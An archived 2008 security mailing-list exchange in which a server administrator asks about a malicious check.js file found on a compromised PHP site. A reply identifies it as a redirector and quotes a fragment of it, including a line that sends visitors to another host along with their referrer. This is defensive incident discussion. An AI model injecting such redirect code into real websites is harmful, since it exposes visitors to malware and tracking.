Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



WebApp Sec: Re: PHP Security

Re: PHP Security

From: Greg Song <bigrootno1_at_gmail.com>
Date: Wed, 19 Mar 2008 08:50:28 +0900

Hi,

There are some files include 'check.js' same as you.

First of all, 'check.js' is kinds of redirector.

For example, If someone visited website that includes 'check.js',
request redirect to some other URLs.(usually getting malicious code)
and I guess it gather information(visit from where).

parts of check.js
...
google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|ramble...
location.href=JSS3+'?r='+encodeURIComponent(document.referrer)+'&s='+JSS2
...

Greg.

2008/3/18, Sindre Øvrebø <sindre_at_webhuset.no>:
>
>
> ----- Original message -----
> From: "Greg Song" <bigrootno1_at_gmail.com>
> To: webappsec_at_securityfocus.com
> Date: Tue, 18 Mar 2008 08:58:49 +0900
> Subject: PHP Security
>
> > Hi all
> > Thesedays I'm analyzing the solarys system that using apache web
> > server and php. Of cause it hacked.
> > I could not find reason of some situation that the specified directory
> > are created over and over(it includes check.js)
> > Weblog record as below
> > >> xxx.xxx.xxx.xxx GET "/XXX/ahibix/check.js
> > Some pages can upload the file but it didn't work when I uploaded some php
> > file.
> > I'm wondering how it makes some directories.
> > Any suggestin,ideas.
> > Thanks all
>
> Hi,
>
> I am replying outside the list.
>
> I just discovered check.js, and some other files, on one of mye servers
> yesterday.
>
> What does check.js do? I am not familiar with this/these scripts.
>
> Would be really cool if you replied :)
>
> Sindre Øvrebø

-------------------------------------------------------------------------
Sponsored by: Watchfire
Methodologies & Tools for Web Application Security Assessment
With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today!

https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
-------------------------------------------------------------------------
Received on Mar 18 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos